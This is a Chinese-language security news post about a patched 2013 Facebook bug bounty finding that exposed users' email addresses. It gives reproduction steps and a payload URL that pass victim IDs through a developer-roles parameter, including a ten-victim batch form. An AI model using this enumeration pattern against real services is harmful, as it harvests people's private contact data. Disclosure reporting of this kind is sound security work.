FaceBook价值4500美元的安全问题

fake 2013-07-23 113199人围观 ,发现 13 个不明物体 WEB安全

日前,国外安全研究者Roy Castillo发现了FaceBook的一个安全问题,在没有任何用户交互的情况下,可以查看任意用户的邮箱地址,提交到FaceBook之后,得到了FaceBook $4500大洋的奖励。

步骤重现:

1、从Facebook的用户个人资料页面提取用户名称,地址:http://www.facebook.com/directory/people/
2、从FaceBook Graph API中提取用户的ID,如用户first_name为Sdfsdfsdafd,last_name为Sdfdsafsdfds,打开http://graph.facebook.com/sdfsdfsdafd.sdfdsafsdfds,可以提取到用户ID为100006240120652。
3、创建Facebook应用–》设置–》开发者角色。
4、最终该漏洞的payload如下:

https://developers.facebook.com/apps/APPLICATION_ID/roles?unverified_groups[1][0]=VICTIM_UID

可以通过增加参数,得到更多的电子邮件地址,如下:

https://developers.facebook.com/apps/APPLICATION_ID/roles
?unverified_groups[1][0]=VICTIM_UID1
&unverified_groups[2][0]=VICTIM_UID2
&unverified_groups[3][0]=VICTIM_UID3
&unverified_groups[4][0]=VICTIM_UID4
&unverified_groups[5][0]=VICTIM_UID5
&unverified_groups[6][0]=VICTIM_UID6
&unverified_groups[7][0]=VICTIM_UID7
&unverified_groups[8][0]=VICTIM_UID8
&unverified_groups[9][0]=VICTIM_UID9
&unverified_groups[10][0]=VICTIM_UID10

公布这个问题之后,Facebook安全响应团队在一个小时左右联系了漏洞提交者:

在上午8点26分该漏洞被修复。

不久之后,Roy Castillo得到了Facebook安全团队的4500美元奖励。

作者赤裸裸的炫耀

[感谢fake提供 via roy-castillo]

这些评论亮了

发表评论

已有 13 条评论

取消
Loading...
css.php